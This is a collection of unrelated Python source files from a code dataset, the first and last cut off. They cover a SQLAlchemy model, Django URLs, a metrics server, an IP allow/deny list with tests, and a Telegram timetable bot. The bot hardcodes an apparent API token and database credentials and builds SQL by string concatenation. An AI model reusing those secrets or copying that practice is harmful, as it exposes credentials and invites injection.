approval_window = sa.Column(sa.Integer, default=5)\n \"\"\"Period (business days), after the delivery, an Order has will be automatic accepted.\n\n If an Order is delivered and not rejected by customer it will be automatic accepted by a task.\n i.e.: 10 would mean an Order in this project could be approved up to 10 days after its delivery.\n Zero means a Order will be automatically approved.\n \"\"\"\n\n add_order_roles = sa.Column(\n JSONB,\n default=DEFAULT_ADD_ORDER_ROLES,\n info={\n 'colanderalchemy': {\n 'title': 'Roles allowed to add an order.',\n 'missing': colander.drop,\n 'typ': schema.List()\n }\n }\n )\n \"\"\"Roles allowed to add orders on this project.\n\n Options come from :mod:`briefy.common.vocabularies.roles.Groups`.\n \"\"\"\n\n @orm.validates('add_order_roles')\n def validate_add_order_roles(self, key, value):\n \"\"\"Validate if values for add_order_roles are correct.\"\"\"\n all_groups = [item.value for item in Groups]\n for item in value:\n if item not in all_groups:\n raise ValidationError(message='Invalid role', name=key)\n return value\n\n @property\n def settings(self) -> Objectify:\n \"\"\"Project settings.\n\n Aggregate settings information about a project.\n :return: Dictionary with all settings for a project.\n \"\"\"\n # TODO: These settings are in a transitional state while\n # we move other configuration-related fields here.\n # To preserve backwards compability, we simply proxy those\n # fields - but their use should be deprecated as possible.\n\n # (NB. Even with Objectify, there is no provision\n # for write-back any of the \"dates\" subfields yet)\n\n return Objectify({\n 'tech_requirements': self.tech_requirements,\n 'delivery_config': self.delivery,\n 'dates': {\n 'cancellation_window': self.cancellation_window,\n 'availability_window': self.availability_window,\n 'approval_window': self.approval_window,\n },\n 'permissions': {\n 'add_order': self.add_order_roles\n },\n 'order_type': self.order_type,\n 'project_type': self.project_type\n })\n\n @settings.setter\n def settings(self, value: t.Union[Objectify, t.Mapping]):\n \"\"\"Project settings.\n\n Set all settings for a project.\n :value: Dictionary with all settings for a project.\n \"\"\"\n # 'PUT' semmantics setter. This will destroy everything on the way.\n # to change a single sub-field, consider changing the just the desired\n # entry along with a call to\n # sqlalchemy.orm.attributes.flag_modified(obj, data_field_name)\n # (check the correct underlying field_name on the settings.getter\n # above while we are in this transitional stage)\n\n value = Objectify(value, sentinel=None)\n self.tech_requirements = value.tech_requirements or {}\n self.delivery = value.delivery_config or {}\n self.add_order_roles = value.permissions.add_order or []\n self.cancellation_window = value.dates.cancellation_window or 0\n self.availability_window = value.dates.availability_window or 0\n self.approval_window = value.dates.approval_window or 0\n\n orders = orm.relationship(\n 'Order',\n foreign_keys='Order.project_id',\n primaryjoin=\"\"\"and_(\n Order.current_type=='order',\n foreign(Order.project_id)==Project.id,\n )\"\"\",\n lazy='dynamic'\n )\n \"\"\"List of Orders of this project.\n\n Returns a collection of :class:`briefy.leica.models.job.order.Order`.\n \"\"\"\n\n leadorders = orm.relationship(\n 'LeadOrder',\n foreign_keys='LeadOrder.project_id',\n primaryjoin=\"\"\"and_(\n LeadOrder.current_type=='leadorder',\n foreign(LeadOrder.project_id)==Project.id,\n )\"\"\",\n lazy='dynamic'\n )\n \"\"\"List of LeadOrders of this project.\n\n Returns a collection of :class:`briefy.leica.models.job.leadorder.LeadOrder`.\n \"\"\"\n\n @hybrid_property\n def total_orders(self) -> int:\n \"\"\"Return the Project total number of orders.\"\"\"\n return self.orders.count()\n\n @total_orders.expression\n def total_orders(cls) -> int:\n \"\"\"Return the Project total number of orders.\"\"\"\n return sa.func.count(cls.orders)\n\n @hybrid_property\n def total_leadorders(self) -> sa.sql.func:\n \"\"\"Return the Project total number of leadorders.\"\"\"\n return self.leadorders.count()\n\n @total_leadorders.expression\n def total_leadorders(cls) -> sa.sql.func:\n \"\"\"Return the Project total number of leadorders.\"\"\"\n return sa.func.count(cls.leadorders)\n\n # Formerly known as brief\n briefing = sa.Column(\n sautils.URLType,\n nullable=True,\n info={\n 'colanderalchemy': {\n 'title': 'Briefing link',\n 'validator': colander.url,\n 'missing': colander.drop,\n 'typ': colander.String\n }\n }\n )\n \"\"\"Path to briefing file regarding this Project.\"\"\"\n\n release_template = sa.Column(\n sautils.URLType,\n nullable=True,\n info={\n 'colanderalchemy': {\n 'title': 'Release template',\n 'validator': colander.url,\n 'missing': colander.drop,\n 'typ': colander.String\n }\n }\n )\n \"\"\"Path to release template file.\"\"\"\n\n pool_id = sa.Column(\n sautils.UUIDType,\n sa.ForeignKey('pools.id'),\n index=True,\n nullable=True,\n info={\n 'colanderalchemy': {\n 'title': 'Pool ID',\n 'validator': colander.uuid,\n 'missing': colander.drop,\n 'typ': colander.String\n }\n }\n )\n \"\"\"Pool ID.\n\n Relationship between a project and a Pool.\n \"\"\"\n\n @sautils.observes('customer_id')\n def _customer_id_observer(self, customer_id):\n \"\"\"Update path when customer id changes.\"\"\"\n if customer_id:\n customer = Item.get(customer_id)\n self.path = customer.path + [self.id]\n\n @cache_region.cache_on_arguments(should_cache_fn=enable_cache)\n def to_summary_dict(self) -> dict:\n \"\"\"Return a summarized version of the dict representation of this Class.\n\n Used to serialize this object within a parent object serialization.\n :returns: Dictionary with fields and values used by this Class\n \"\"\"\n data = super().to_summary_dict()\n return data\n\n @cache_region.cache_on_arguments(should_cache_fn=enable_cache)\n def to_listing_dict(self) -> dict:\n \"\"\"Return a summarized version of the dict representation of this Class.\n\n Used to serialize this object within a parent object serialization.\n :returns: Dictionary with fields and values used by this Class\n \"\"\"\n data = super().to_listing_dict()\n data = self._apply_actors_info(data)\n return data\n\n @cache_region.cache_on_arguments(should_cache_fn=enable_cache)\n def to_dict(self, excludes: list=None, includes: list=None):\n \"\"\"Return a dict representation of this object.\"\"\"\n data = super().to_dict(excludes=excludes, includes=includes)\n data['settings'] = self.settings._get()\n if includes and 'state_history' in includes:\n # Workflow history\n add_user_info_to_state_history(self.state_history)\n # Apply actor information to data\n data = self._apply_actors_info(data)\n return data\n\n\n@event.listens_for(Project, 'after_update')\ndef project_after_update(mapper, connection, target):\n \"\"\"Invalidate Project cache after instance update.\"\"\"\n project = target\n cache_region.invalidate(project)\n","repo_name":"BriefyHQ/briefy.leica","sub_path":"src/briefy/leica/models/project/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":20359,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"36161590308","text":"from tkinter import *\nfrom tkinter.filedialog import askopenfilename\n# from tkinter.filedialog import asksaveasfilename\n\n\nclass countLetters_solution:\n \"\"\"\n Count letters' appeared times\n \"\"\"\n def __init__(self):\n window = Tk()\n frame1 = Frame(window)\n frame1.grid()\n\n scrollbar = Scrollbar(frame1)\n scrollbar.pack(side = RIGHT, fill = Y)\n self.text = Text(frame1, width = 50, height = 20,\n wrap = WORD, yscrollcommand = scrollbar.set)\n self.text.pack()\n scrollbar.config(command = self.text.yview())\n\n frame2 = Frame(window)\n frame2.grid()\n Label(frame2, text = \"Enter a filename: \").grid(row = 1, column = 1)\n self.textInfo = StringVar()\n Entry(frame2, textvariable = self.textInfo, width = 20).grid(row = 1, column = 2)\n Button(frame2, text = \"Browse\", command = self.browse_file).grid(row = 1, column = 3)\n Button(frame2, text = \"Show Result\", command = self.show_result).grid(row = 1, column = 4)\n\n window.mainloop()\n\n def browse_file(self):\n filenameforReading = askopenfilename()\n infile = open(filenameforReading, \"r\")\n self.allInfoDict = self.get_info_to_file(infile)\n infile.close()\n\n def get_info_to_file(self, infile):\n # count the numbers of each letter in infile\n # and make it beautiful\n allInfoDict = {} # create a dict\n eachLetter = infile.read(1)\n while eachLetter != '':\n if eachLetter.isalpha():\n if eachLetter not in allInfoDict:\n allInfoDict[eachLetter] = 1\n else:\n allInfoDict[eachLetter] += 1\n eachLetter = infile.read(1)\n\n return allInfoDict # Return a dict including all the letters and it's appeared times\n\n def show_result(self):\n try :\n if self.textInfo.get().strip() != '': # except the space character\n fileRutine = self.textInfo.get()\n infile = open(fileRutine, \"r\")\n self.allInfoDict = self.get_info_to_file(infile)\n infile.close()\n except IOError or FileNotFoundError:\n print(\"Enter's wrong, please try\")\n finally:\n for key in self.allInfoDict:\n if self.allInfoDict[key] < 2:\n self.text.insert(END, \"{} appears {} time\\n\".format(key, self.allInfoDict[key]))\n else:\n self.text.insert(END, \"{} appears {} times\\n\".format(key, self.allInfoDict[key]))\n\n self.allInfoDict.clear() # clear information after showed\n\nif __name__ == '__main__':\n countLetters_solution()\n","repo_name":"romanticair/python","sub_path":"basis/tkinter-demo/tk_check_times_of_letter_appear_1.py","file_name":"tk_check_times_of_letter_appear_1.py","file_ext":"py","file_size_in_byte":2721,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"22435956770","text":"from django.conf.urls import url, include\nfrom django.contrib import admin\n\nfrom django.conf.urls.static import static\nfrom django.conf import settings\n\nfrom checkin_app.views import UserCreateView, IndexView, ChildCreateView, \\\n ChildDetailView, TimeCreateView, EmployeeListView, \\\n TimeUpdateView, SchoolDetailView, ProfileUpdateView, \\\n CheckinSuccessView\n\nurlpatterns = [\n url(r'^admin/', admin.site.urls),\n url(r'^', include('django.contrib.auth.urls'), name='login'),\n url(r'^create_user/$', UserCreateView.as_view(), name='user_create_view'),\n url(r'^accounts/profile/$', ProfileUpdateView.as_view(), name='profile_view'),\n url(r'^$', IndexView.as_view(), name='index_view'),\n url(r'^child/create/$', ChildCreateView.as_view(), name='child_create_view'),\n url(r'^child/(?P\\d+)/$', ChildDetailView.as_view(), name='child_detail_view'),\n url(r'^employee/$', EmployeeListView.as_view(), name='employee_list_view'),\n url(r'^school/$', SchoolDetailView.as_view(), name='school_detail_view'),\n url(r'^child/(?P\\d+)/create/$', TimeCreateView.as_view(), name='time_create_view'),\n url(r'^child/(?P\\d+)/update/$', TimeUpdateView.as_view(), name='time_update_view'),\n url(r'^child/(?P\\d+)/success/$', CheckinSuccessView.as_view(), name='checkin_success_view'),\n] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n","repo_name":"rallen0150/child_checkin","sub_path":"checkin/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"40861001394","text":"import socket\nfrom ipaddress import ip_address\nfrom http.server import HTTPServer,BaseHTTPRequestHandler\n\nclass Metrics(HTTPServer): \n def __init__(self, address, collectors):\n if ip_address(address[0]).version == 6: \n self.address_family = socket.AF_INET6\n self.collectors = collectors \n super().__init__(address, self.RequestHandler)\n\n class RequestHandler(BaseHTTPRequestHandler):\n def do_GET(self):\n if self.path != \"/metrics\":\n return self.send_error(404)\n\n metrics = []\n for collector in self.server.collectors:\n for metric in collector.get_metrics():\n metrics.append(metric.format_prom())\n\n output = '\\n'.join(metrics) + '\\n'\n self.send_response(200)\n self.end_headers()\n self.wfile.write(output.encode())\n","repo_name":"w1kl4s/yatrex","sub_path":"src/PrometheusServer.py","file_name":"PrometheusServer.py","file_ext":"py","file_size_in_byte":887,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"41660364479","text":"import pytest,yaml,allure,os\nfrom page.app import App\n\n@allure.feature(\"搜索\")\nclass Testsearch:\n @pytest.mark.parametrize(\"key,price\",yaml.safe_load(open('D:\\\\pythonCoding\\\\pythonProject\\\\xueqiuAutoTeat\\\\TestCase\\\\search.yml')))\n @allure.story(\"搜索股价\")\n def test_search(self,key,price):\n with allure.step(\"首页点击搜索,进入搜索页面,输入关键词搜索,并断言\"):\n assert App().start().main().goto_search_page().searchinput(key).get_price()>float(price)\n @allure.story(\"点击头像进入我的页面\")\n def test_photo001(self):\n App().start().main().goto_my_photo()\n\n# if __name__ == '__main__':\n#\n# pytest.main(['./case/test_search.py','-sv','--alluredir',\"../Testroport/report\"])\n# os.system(f\"allure generate ../Testroport/report -o ../Testroport/report --clean\")\n","repo_name":"Jinghua123456/yueying","sub_path":"pythonProject/xueqiuAutoTeat/case/test_search.py","file_name":"test_search.py","file_ext":"py","file_size_in_byte":847,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"26174351899","text":"import networkx as nx\nimport matplotlib.pyplot as plt\nimport time\nimport datetime\n\n\ndef find_mcps(tree):\n s = -1\n t = -2\n R, S = nx.bipartite.sets(tree)\n flow_vertices = [s] + [t] + list(R) + list(S)\n flow_edges = []\n for i in R:\n for j in tree[i]:\n flow_edges.append((i, j))\n\n f = nx.DiGraph()\n f.add_nodes_from(flow_vertices)\n\n # Connect s to R, S to t, and add flow edges\n f.add_edges_from([(s, i) for i in R], capacity=2)\n f.add_edges_from([(j, t) for j in S], capacity=2)\n f.add_edges_from(flow_edges, capacity=1)\n\n flow_value, flow_dict = nx.maximum_flow(f, s, t)\n\n mcps = [(i, j) for (i, j) in flow_edges if flow_dict[i][j] == 0]\n return mcps\n\n\ndef main():\n with open(\"mcps_max_flow.txt\", \"w\") as file:\n file.write(f\"{datetime.datetime.now()}\\n\")\n file.write(f\"test, size, bmatching size, bmatching time\\n\")\n\n for tree_size in [10, 100, 1000, 10000]:\n for iteration in range(1000):\n tree = nx.random_tree(tree_size)\n\n st = time.time()\n bmatching_mcps = find_mcps(tree)\n bmatching_time = time.time() - st\n bmatching_size = len(bmatching_mcps)\n\n with open(\"mcps_max_flow.txt\", \"a\") as file:\n file.write(f\"{iteration+1}, {tree_size}, {bmatching_size}, {bmatching_time}\\n\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"JacobRestanio/mcps","sub_path":"maxflow.py","file_name":"maxflow.py","file_ext":"py","file_size_in_byte":1388,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"9908610480","text":"#Shaaheen Sacoor SCRSHA001\r\n#19 April 2014\r\n#Program to enter a right aligned list of names\r\n\r\ndef main():\r\n list_string =[] # Empty list to add into later\r\n strings = input(\"Enter strings (end with DONE):\\n\")\r\n if strings == \"DONE\":\r\n print(\"\")\r\n print(\"Right-aligned list:\")\r\n else:\r\n while strings!=\"DONE\":\r\n list_string.append(strings) # Adds strings to list\r\n strings = input(\"\")\r\n \r\n print(\"\\nRight-aligned list:\")\r\n lengthlist=[]\r\n for i in range(len(list_string)): #To find longest word from the list for the aligning\r\n lengthlist.append(len(list_string[i]))\r\n lengthlist.sort()\r\n lengthlist.reverse()\r\n longest_length =lengthlist[0]\r\n rightalign = '{:>'\r\n rightalign += str(longest_length)\r\n rightalign += '}'\r\n for i in range(len(list_string)): #Goes through list \r\n print(rightalign.format(list_string[i]))\r\n \r\nmain()\r\n \r\n","repo_name":"MrHamdulay/csc3-capstone","sub_path":"examples/data/Assignment_6/scrsha001/question1.py","file_name":"question1.py","file_ext":"py","file_size_in_byte":1025,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"10251733580","text":"'''\nCreated on Nov 6, 2020\n\n@author: braistedjc\n'''\nfrom pprint import pprint\n\nclass loadResource(object):\n '''\n classdocs\n '''\n def __init__(self):\n self.loadStatus = \"\"\n self.destTable = \"\"\n self.loadType = \"\"\n self.stagingFile = \"\"\n self.primaryKey = \"\"\n self.columnNames = []\n \n def initFileResource(self, resource):\n self.loadStatus = resource.status\n self.stagingFile = resource.file\n self.loadType = resource.loadType\n self.destTable = resource.table\n self.primaryKey = resource.primaryKey\n self.columnNames = resource.colNames.split(\",\")\n \n def printResource(self):\n pprint(vars(self))\n\n","repo_name":"ncats/RaMP-BackEnd","sub_path":"src/rampConfig/loadConfig.py","file_name":"loadConfig.py","file_ext":"py","file_size_in_byte":719,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"40"} +{"seq_id":"73720927479","text":"from django.contrib import admin\nfrom django.urls import path\nfrom products import views\n\nurlpatterns = [\n path('department/', views.ListDepartmentView.as_view(), name=\"department_list\"),\n path('department/create', views.CreateDepartmentView.as_view(), name=\"department_create\"),\n path('department//update', views.UpdateDepartmentView.as_view(), name=\"department_update\"),\n path('category/', views.ListCategoryView.as_view(), name=\"category_list\"),\n path('category/create', views.CreateCategoryView.as_view(), name = \"category_create\"),\n path('category//update', views.UpdateCategoryView.as_view(), name=\"category_update\"),\n path('products/', views.ListProductView.as_view(), name=\"products\"),\n path('products//', views.DetailProductView.as_view(), name=\"product_detail\"),\n path('products//update/', views.UpdateProductView.as_view(), name=\"product_update\"),\n path('products/create/', views.CreateProduct, name = \"product_create\"),\n]","repo_name":"Hernandes-Silva/virtual_store","sub_path":"products/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":995,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"31696983702","text":"import json\n\nfrom kafka import KafkaProducer\nfrom main import BROKER_URL\n\nproducer = KafkaProducer(bootstrap_servers=BROKER_URL)\n\n\npayload = {\n \"product_id\": 1,\n \"price\": {\n \"amount\": 10.99,\n \"currency\": \"PLN\",\n },\n}\nserialized = json.dumps(payload).encode()\n\n\nfuture = producer.send(\"products\", value=serialized)\nfuture.get(timeout=5)\n","repo_name":"Enforcer/micro-kafka","sub_path":"buying_process_manager/send_product_bought.py","file_name":"send_product_bought.py","file_ext":"py","file_size_in_byte":359,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"40"} +{"seq_id":"27841466036","text":"#!/usr/bin/env python\n\nimport common, unittest\nimport os, tempfile\n\nmod = common.load('network_access', common.TOOLS_DIR + '/scripts/clipboard/python/network_access.py')\n\nclass NetworkAccessTests(common.TestCase):\n def setUp(self):\n self.access = mod.NetAccess()\n\n '''\n Confirm that an address is allowed on a NetAccess instance with no loaded rules.\n '''\n def test_allow_simple(self):\n self.assertTrue(self.access.is_allowed('127.0.0.1'))\n\n '''\n Confirm that an address is allowed on account of not being a blacklisted address.\n '''\n def test_allow_blacklist(self):\n self.access.add_blacklist('10.0.0.1')\n self.assertFalse(self.access.is_allowed('10.0.0.1'))\n self.assertTrue(self.access.is_allowed('10.1.1.1'))\n\n '''\n Confirm that an address is allowed on account of not being in a blacklisted network.\n '''\n def test_allow_blacklist_network(self):\n self.access.add_blacklist('10.0.0.0/16')\n self.assertTrue(self.access.is_allowed('10.1.1.1'))\n\n '''\n Confirm that an address is allowed on account of being a whitelisted address.\n '''\n def test_allow_whitelist(self):\n self.access.add_whitelist('10.0.0.1')\n self.assertTrue(self.access.is_allowed('10.0.0.1'))\n\n '''\n Confirm that an address is allowed on account of being in a whitelisted network network.\n '''\n def test_allow_whitelist_network(self):\n self.access.add_whitelist('10.0.0.0/16')\n self.assertTrue(self.access.is_allowed('10.0.0.1'))\n self.assertTrue(self.access.is_allowed('10.0.254.254'))\n self.assertTrue(self.access.is_allowed('10.0.1.2'))\n\n '''\n Test block on account of a blacklisted address.\n '''\n def test_block_blacklist(self):\n\n addr = '127.0.0.1'\n\n self.access.add_blacklist(addr)\n self.assertFalse(self.access.is_allowed(addr))\n\n '''\n Test block on account of being in a blacklisted network.\n '''\n def test_block_blacklist_network(self):\n\n self.access.add_blacklist('10.0.0.0/16')\n self.assertTrue(self.access.is_allowed('9.255.255.254')) # Lower address\n self.assertTrue(self.access.is_allowed('10.1.0.1')) # Higher address\n self.assertFalse(self.access.is_allowed('10.0.0.1')) # Start of range\n self.assertFalse(self.access.is_allowed('10.0.254.254')) # End of range\n\n '''\n Confirm that blacklisted address takes precedence over a whitelisted network.\n '''\n def test_block_blacklist_precedence_address(self):\n self.access.add_whitelist('10.0.0.0/16')\n self.access.add_blacklist('10.0.0.1')\n self.assertFalse(self.access.is_allowed('10.0.0.1'))\n self.assertTrue(self.access.is_allowed('10.0.0.2'))\n\n '''\n Confirm that blacklisted network takes precedence over a whitelisted network.\n '''\n def test_block_blacklist_precedence_network(self):\n self.access.add_whitelist('10.0.0.0/16')\n self.access.add_blacklist('10.0.0.0/24')\n self.assertFalse(self.access.is_allowed('10.0.0.1'))\n self.assertTrue(self.access.is_allowed('10.0.1.1'))\n\n '''\n Test block on account of not being a whitelisted address.\n '''\n def test_block_whitelist(self):\n\n self.access.add_whitelist('192.168.0.1')\n self.assertFalse(self.access.is_allowed('192.168.0.2'))\n\n '''\n Test block on account of not being within a whitelisted network.\n '''\n def test_block_whitelist_network(self):\n\n self.access.add_whitelist('192.168.0.0/24')\n self.assertFalse(self.access.is_allowed('192.168.1.1'))\n\n '''\n Test block on account of not being within a whitelisted network on a file with a lower address\n '''\n def test_block_whitelist_network_b(self):\n\n self.access.add_whitelist('192.168.1.0/24')\n self.assertFalse(self.access.is_allowed('192.168.0.255')) # Test an address below the whitelisted range\n self.assertFalse(self.access.is_allowed('192.168.2.0')) # Test an address above the whitelisted range\n\n '''\n Test behavior of loading a file containing blacklisted addresses.\n '''\n def test_file_blacklist_file(self):\n with tempfile.TemporaryDirectory() as src:\n path = os.path.join(src, 'access-file')\n with open(path, 'w') as f:\n f.write('192.168.0.1\\n')\n f.write('192.168.1.0/24\\n')\n\n self.access.load_blacklist_file(path)\n\n self.assertFalse(self.access.is_allowed('192.168.0.1')) # Test the manual unwanted address\n self.assertFalse(self.access.is_allowed('192.168.1.1')) # Test an unwanted address in the blacklisted CIDR range.\n self.assertTrue(self.access.is_allowed('192.168.0.2')) # Test a not-unwanted field\n\n '''\n Test behavior of loading a file containing whitelisted addresses.\n '''\n def test_file_whitelist_file(self):\n with tempfile.TemporaryDirectory() as src:\n path = os.path.join(src, 'access-file')\n with open(path, 'w') as f:\n f.write('192.168.0.1\\n')\n f.write('192.168.1.0/24\\n')\n\n self.access.load_whitelist_file(path)\n\n self.assertTrue(self.access.is_allowed('192.168.0.1')) # Test the manual address\n self.assertTrue(self.access.is_allowed('192.168.1.1')) # Test an address in the allowed CIDR range.\n self.assertFalse(self.access.is_allowed('192.168.0.2')) # Test an unwanted field\n\n '''\n Confirm various conversions of IPv4 addreses to a number.\n '''\n def test_ip_strton(self):\n\n tests = [\n ('255.255.255.254', 4294967294),\n ('192.168.0.1', 3232235521),\n ('10.0.0.1', 167772161),\n ('10.0.0.2', 167772162)\n ]\n for value_string, value_num in tests:\n self.assertEqual(value_num, self.access.ip_strton(value_string))\n","repo_name":"adeutscher/core-tools","sub_path":"scripts/test/tests.d/clipboard/python/network_access.py","file_name":"network_access.py","file_ext":"py","file_size_in_byte":5889,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"40"} +{"seq_id":"71697903480","text":"import telebot\nimport pyjokes\nfrom tabula import read_pdf\nfrom tabula import read_pdf_with_template\nfrom telebot import types\nimport json\nimport datetime\nimport pymysql as sq\n\n\nTOKEN = \"829593578:AAHlUspWbFlV287wEzXHAr3ZONjyp-EjCsQ\"\nbot = telebot.TeleBot(TOKEN)\n\nchat_ids = set()\n\nprint(\"\\n[+] Working........\")\n\n#help\n@bot.message_handler(commands=[\"help\"])\ndef help_command(message):\n # print(chat_ids)\n chat_ids.add(message.chat.id)\n bot.send_message(message.chat.id,\"List of Commands:\\n/start\\n/pun\\n/help\\n/schedule\\n\")\n\n\n#start\n@bot.message_handler(commands=[\"start\"])\ndef start_command(message):\n # print(\"received\")\n bot.send_message(message.chat.id,\"Greetings! Welcome.... \\nMyself Ervin. Created to serve as helping hand...\\nI can serve the purpose if my c0de doesn't crash xD....\\nUse /help for list of commands...\")\n\n\n#pun\n@bot.message_handler(commands=[\"pun\"])\ndef pun_command(message):\n bot.send_message(message.chat.id,pyjokes.get_joke())\n\n# pp = \"dcn\"\n#mon_r1\n@bot.message_handler(commands=[\"schedule\"])\ndef scheduler(message):\n markup = telebot.types.InlineKeyboardMarkup() # row_width=2\n itembtn2 = telebot.types.InlineKeyboardButton(\"ECE\", callback_data=\"2\")\n itembtn1 = telebot.types.InlineKeyboardButton(\"CSE\", callback_data=\"1\")\n itembtn3 = telebot.types.InlineKeyboardButton('EEE', callback_data=\"3\")\n itembtn4 = telebot.types.InlineKeyboardButton('CIVIL', callback_data=\"4\")\n itembtn5 = telebot.types.InlineKeyboardButton('MME', callback_data=\"5\")\n itembtn6 = telebot.types.InlineKeyboardButton('MINING', callback_data=\"6\")\n itembtn7 = telebot.types.InlineKeyboardButton('ARCHI', callback_data=\"7\")\n markup.add(itembtn1)\n markup.add(itembtn2, itembtn3)\n markup.add(itembtn4, itembtn5, itembtn6, itembtn7)\n # bot.send_message(message.chat.id, \"Select your Dept.\", reply_markup=markup)\n # markup = types.ReplyKeyboardRemove(selective=True)\n bot.send_message(message.chat.id, \"Select Dept....\", reply_markup=markup)\n # bot.send_message(message.chat.id,a)\n\n@bot.callback_query_handler(lambda call: call.data in [\"1\",\"2\",\"3\",\"4\",\"5\",\"6\",\"7\"])\ndef day_scheduler(call):\n markup = telebot.types.InlineKeyboardMarkup()#row_width=2\n weekday = datetime.datetime.today().weekday()\n dept = call.data\n yes = telebot.types.InlineKeyboardButton(\"YESTERDAY\",callback_data=str(weekday+1)+dept)\n tod = telebot.types.InlineKeyboardButton(\"TODAY\",callback_data=str(weekday+2)+dept)\n tom = telebot.types.InlineKeyboardButton(\"TOMORROW\",callback_data=str(weekday+3)+dept)\n mon = telebot.types.InlineKeyboardButton(\"MON\",callback_data=\"2\"+dept)\n tue = telebot.types.InlineKeyboardButton(\"TUE\",callback_data=\"3\"+dept)\n wed = telebot.types.InlineKeyboardButton('WED',callback_data=\"4\"+dept)\n thurs = telebot.types.InlineKeyboardButton('THURS',callback_data=\"5\"+dept)\n fri = telebot.types.InlineKeyboardButton('FRI',callback_data=\"6\"+dept)\n markup.add(yes,tod,tom)\n markup.add(mon,tue)\n markup.add(wed,thurs,fri)\n kb = types.InlineKeyboardMarkup()\n cid = call.message.chat.id\n mid = call.message.message_id\n bot.edit_message_text(\"Select day....\", cid, mid, reply_markup=markup)\n # bot.send_message(message.chat.id, \"Choose the day....\", reply_markup=markup)\n # bot.callback_query_handler(schedule_callback)\n\n# @bot.answer_callback_query(callback_query_id=ca)\n\n# @bot.callback_query_handler(lambda call: call.data in [2,3,4,5,6])\n@bot.callback_query_handler(lambda call: len(call.data) == 2) # in [\"2\",\"3\",\"4\",\"5\",\"6\"])\ndef schedule_callback(call):\n day = call.data\n print(day)\n # print(type(call.data))\n # print(call.data)\n markup = telebot.types.InlineKeyboardMarkup() # row_width=2\n r1 = telebot.types.InlineKeyboardButton(\"R1\", callback_data=\"1\"+day)\n r2 = telebot.types.InlineKeyboardButton(\"R2\", callback_data=\"2\"+day)\n r3 = telebot.types.InlineKeyboardButton(\"R3\", callback_data=\"3\"+day)\n r4 = telebot.types.InlineKeyboardButton('R4', callback_data=\"4\"+day)\n markup.add(r1,r2)\n markup.add(r3,r4)\n kb = types.InlineKeyboardMarkup()\n cid = call.message.chat.id\n mid = call.message.message_id\n bot.edit_message_text(\"Choose Batch....\", cid, mid, reply_markup=markup)\n\n\n@bot.callback_query_handler(lambda call: len(call.data) == 3)\ndef foo(call):\n kb = types.InlineKeyboardMarkup()\n cid = call.message.chat.id\n mid = call.message.message_id\n databases = [\"\",\"CSE\",\"ECE\",\"EEE\",\"CIVIL\",\"MME\",\"MINING\",\"ARCHI\"]\n days = [\"Monday\", \"Tuesday\", \"Wednesday\", \"Thursday\", \"Friday\", \"Saturday\", \"Sunday\"]\n database = databases[int(call.data[2])]\n print(call.data)\n if int(call.data[2]) == 1 or int(call.data[2]) == 4:\n day = int(call.data[1])\n day = day % 7\n batch = \"R\" + call.data[0]\n ll = \"\" + days[int(day) - 2] + \" \" + batch + \"\\n\"\n ll += \"----------------------------\\n\"\n if int(day) in range(2, 7):\n db = sq.connect(\"localhost\", \"nomad\", \"nomad\", database)\n cursor = db.cursor()\n sql = \"select * from \" + batch\n try:\n cursor.execute(sql)\n res = cursor.fetchall()\n for row in res:\n id = row[0]\n time = row[1]\n sub = row[int(day)]\n ll = ll + \"{time: <8} {sub: <13}\\n\".format(time=time, sub=sub)\n # print(ll, sep=\" \")\n except Exception as e:\n print(\"err\")\n print(e)\n ll = \"Error\"\n\n else:\n ll = \"I guess it's a holiday, right???\"\n # print(message.text[-2:])\n else:\n ll = \"Time - Table is yet to be added....\\nSorry for inconvenience\"\n bot.edit_message_text(ll, cid, mid, reply_markup=kb, parse_mode='HTML')\n # bot.send_message(message.chat.id,ll)\n\n\n'''\n@bot.message_handler(func=lambda message: False) #cause there is no message\ndef saturday_message():\n now = datetime.now()\n me = bot.get_me()+\n if (now.date().weekday() == 5) and (now.time() == time(8,0)):\n bot.send_message(me.id, 'Wake up!')\n\n\n#replying same message\n@bot.message_handler(func=lambda m: True)\ndef echo_all(message):\n\tbot.reply_to(message, message.text)\n'''\n\n@bot.message_handler(commands=[\"set_dept\"])\ndef setdept(message):\n markup = telebot.types.ReplyKeyboardMarkup()#row_width=2\n itembtn2 = telebot.types.KeyboardButton('ECE')\n itembtn1 = telebot.types.KeyboardButton(\"CSE\")\n itembtn3 = telebot.types.KeyboardButton('EEE')\n itembtn4 = telebot.types.KeyboardButton('CIVIL')\n itembtn5 = telebot.types.KeyboardButton('MME')\n itembtn6 = telebot.types.KeyboardButton('MINING')\n itembtn7 = telebot.types.KeyboardButton('ARCHI')\n markup.add(itembtn1)\n markup.add( itembtn2, itembtn3)\n markup.add(itembtn4, itembtn5, itembtn6,itembtn7)\n bot.send_message(message.chat.id, \"Select your Dept.\", reply_markup=markup)\n\n\n@bot.message_handler(regexp=\"BT17CSE0[0-9][0-9]\")\ndef cse(message):\n with open('../data/cse226.template_777.json', 'r') as fp:\n obj = json.load(fp)\n a = []\n for i in range(len(obj)):\n p = []\n p.append(obj[i][\"y1\"])\n p.append(obj[i][\"x1\"])\n p.append(obj[i][\"y2\"])\n p.append(obj[i][\"x2\"])\n a.append(p)\n z = message.text[-2:]\n k = int(z) + 146\n print(k)\n df = read_pdf('../data/cse.pdf', pages=k, 